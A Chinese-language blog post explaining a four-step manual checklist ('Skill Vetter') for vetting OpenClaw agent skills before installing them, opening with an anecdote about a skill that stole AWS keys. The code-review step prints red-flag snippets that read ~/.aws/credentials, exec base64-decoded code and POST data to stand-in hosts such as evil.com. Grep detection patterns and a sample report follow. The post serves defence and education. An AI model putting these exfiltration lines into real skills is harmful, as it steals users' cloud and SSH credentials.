你好,我是郑工长。
昨天,有个朋友私信我,说他装了一个"文件整理"的 Skill 后,AWS 的 Access Key 被盗了。
查了两天才发现:那个 Skill 偷偷读取了 ~/.aws/credentials,把密钥发到了外部服务器。
损失?3万多块的云服务账单。
更讽刺的是:他在 ClawHub 上看到这个 Skill 有 800 多颗星,作者是"资深开发者"。
你看,有星星 ≠ 安全。
OpenClaw 生态现在有 42,769 个 Skills,95% 的人装之前根本不会审查代码。
今天,我把 175k 人都在用的 Skill Vetter 安全审查流程 拆开了讲清楚——它不是自动工具,是你必须手动走一遍的安全 Checklist。
如何安装 Skill Vetter
在开始使用之前,先安装这个 Skill:
# 在 OpenClaw 中安装
npx clawhub@latest install skill-vetter
# 或者使用短命令
npx skills install skill-vetter
安装后检查:
# 查看是否安装成功
ls ~/.openclaw/skills/skill-vetter/
# 查看版本
cat ~/.openclaw/skills/skill-vetter/SKILL.md | head -20
如果安装失败?
- 检查网络连接
- 确认 OpenClaw 版本:
openclaw --version - 手动下载:GitHub - spclaudehome/skill-vetter
一、先搞清楚:Skill Vetter 到底是什么?
很多人误解了 Skill Vetter。
它不是:
- ❌ 一键扫描工具
- ❌ 自动杀毒软件
- ❌ 装了就万事大吉的插件
它是:
- ✅ 一套人工审查流程
- ✅ 4 步安全检查清单
- ✅ 给 AI 的安全思维框架
一句话理解:在你准备安装任何 Skill 之前,用它来"人工审查一遍"。
二、标准使用流程:4 步安全检查
✅ Step 1:来源检查(Source Check)
问自己这 4 个问题:
| 检查项 | 红旗信号 |
|---|---|
| 这个 Skill 从哪来的? | 不明链接、私人群组转发 |
| 作者是谁?靠谱不? | 无名作者、无历史作品 |
| 有没有 star / 下载量? | 0 star、0 下载 |
| 最近有没有更新? | 超过 1 年未更新 |
目的:判断是不是"野路子代码"
实战建议:
- 优先选 ClawHub 官方收录的 Skills
- GitHub 上的 Skill 要看作者历史贡献
- 别信"内部渠道""限时分享"的 Skill
✅ Step 2:强制代码审查(最关键!)
打开 Skill 的所有文件,重点盯这些红旗:
🚨 高危信号(看到直接放弃)
# ❌ 要 token / API key
api_key = os.environ.get("OPENAI_API_KEY")
# ❌ 读 ~/.ssh / ~/.aws
with open(os.path.expanduser("~/.aws/credentials")) as f:
content = f.read()
# ❌ 发数据到外部服务器
requests.post("https://evil.com/collect", json=data)
# ❌ 有 eval / exec
eval(user_input)
# ❌ base64 解码(常见混淆)
exec(base64.b64decode(encoded_string))
# ❌ curl 不明地址
subprocess.run(["curl", "-X", "POST", "suspicious.api.com"])
怎么检查?
# 1. 找到 Skill 的安装目录
ls ~/.openclaw/skills/xxx/
# 2. 用 grep 快速扫描高危关键词
grep -r "eval\|exec\|base64.b64decode" ./
grep -r "~/.ssh\|~/.aws\|~/.bashrc" ./
grep -r "requests.post\|curl" ./
看到上面任何一条:直接放弃安装。
✅ Step 3:权限范围评估(Permission Scope)
想清楚这 4 个问题:
| 检查项 | 核心原则 |
|---|---|
| 它要读什么文件? | 只读必要的配置文件 |
| 它要写什么? | 写入范围是否最小化 |
| 要不要联网? | 功能是否需要联网 |
| 权限和功能是否匹配? | "计算器"不需要读 SSH 密钥 |
核心一句话:
"它要的权限,是不是刚刚好?"
反面教材:
- 一个"天气查询"Skill 要读取你的 SSH 密钥 → 明显越权
- "文件整理"Skill 要联网上传数据 → 功能不匹配
✅ Step 4:风险评级(Risk Classification)
给这个 Skill 定级:
| 风险等级 | 标识 | 处理建议 |
|---|---|---|
| 🟢 低风险 | 可以装 | 知名作者、代码透明、权限合理 |
| 🟡 中风险 | 仔细再看 | 小众作者、功能较复杂 |
| 🔴 高风险 | 必须人工确认 | 权限过大、代码有混淆 |
| ⛔ 极高 | 不要装 | 发现高危代码、来源不明 |
三、输出一个"审查报告"(推荐)
Skill Vetter 已经定义好了审查报告模板,建议每次审查后都输出一份:
═══════════════════════════════════════
SKILL VETTING REPORT
═══════════════════════════════════════
Skill: file-organizer
Source: GitHub (github.com/xxx/file-organizer)
Author: @unknown-dev (0 contributions)
Version: 1.0.0
───────────────────────────────────────
METRICS:
• Stars: 23
• Last Updated: 2025-08 (8 months ago)
• Files Reviewed: 3
───────────────────────────────────────
RED FLAGS:
🔴 读取 ~/.aws/credentials
🔴 base64 解码后执行代码
🔴 发送数据到 api.collect-data.xyz
───────────────────────────────────────
PERMISSIONS:
• Files: read ~/.aws/*, write /tmp/*
• Network: api.collect-data.xyz (suspicious)
• Commands: curl, base64
───────────────────────────────────────
RISK LEVEL: ⛔ EXTREME
VERDICT: ⛔ DO NOT INSTALL
═══════════════════════════════════════
为什么要有报告?
- 留档备查
- 分享给团队
- 发现异常时回溯
四、在 OpenClaw / Agent 里的 3 种用法
👉 用法 1:手动辅助决策(最推荐)
你自己看代码 + 按这个流程判断
适用场景:
- 偶尔装几个 Skill
- 对安全性要求高
- 有技术背景能看代码
优点:
- 完全可控
- 理解每个风险点
👉 用法 2:让 AI 帮你审查(更高级)
把 Skill 代码 + Skill Vetter 规则一起喂给 AI:
请按照 Skill Vetter 的规则,帮我审查这个 skill:
【Skill Vetter 规则】
1. 来源检查:看作者、star 数、更新频率
2. 代码审查:检查是否有 eval/exec/base64/读取敏感文件/发送外部请求
3. 权限评估:评估权限是否匹配功能
4. 风险评级:给出 🟢🟡🔴⛔ 评级
【Skill 代码】
(贴上代码)
请输出审查报告。
适用场景:
- 代码量大,人工看不过来
- 需要批量审查
- 有 AI Agent 支持
👉 用法 3:接入自动化工作流(可变现方向)
结合 n8n + OpenClaw 多 Agent,做一个:
「Skill 自动安全审计 Agent」
自动流程:
1. 抓取 GitHub Skill 仓库
2. 拉取所有代码文件
3. 调用 AI(带 Vetter 规则)审查
4. 输出风险报告(标红危险代码)
5. 推送到飞书/邮件通知
这就是一个可变现的方向:
- Skill 安全扫描服务
- 企业级 Skill 审核
- 安全合规报告
五、本质总结:为什么 Skill Vetter 不是工具,而是框架?
这个 Skill 的本质不是:
- ❌ 自动帮你做事
- ❌ 一键出结果的扫描器
- ❌ 装了就能高枕无忧的插件
而是:
- ✅ 给 AI 一套"安全思维框架"
- ✅ 让你在装 Skill 前"强制思考"
- ✅ 把安全意识变成标准化流程
换句话说:它教你的是"钓鱼的方法",而不是"给你一条鱼"。
六、立即行动:你的第一步
现在就做这 3 件事:
检查你已装的 Skills
ls ~/.openclaw/skills/看看有没有来源不明的。
给常用 Skill 建个审查档案
用上面的报告模板,给每个常用 Skill 打分。设置安全红线
团队内部规定:任何新 Skill 必须通过 4 步检查才能安装。
结尾:安全是一种习惯
175k 人下载了 Skill Vetter,但真正走完整流程的可能不到 5%。
别让那 95% 的侥幸心理害了你。
下次装 Skill 前,记得:
"来源可信吗?代码干净吗?权限合理吗?风险可控吗?"
四个问题,可能帮你省下几万块的损失。
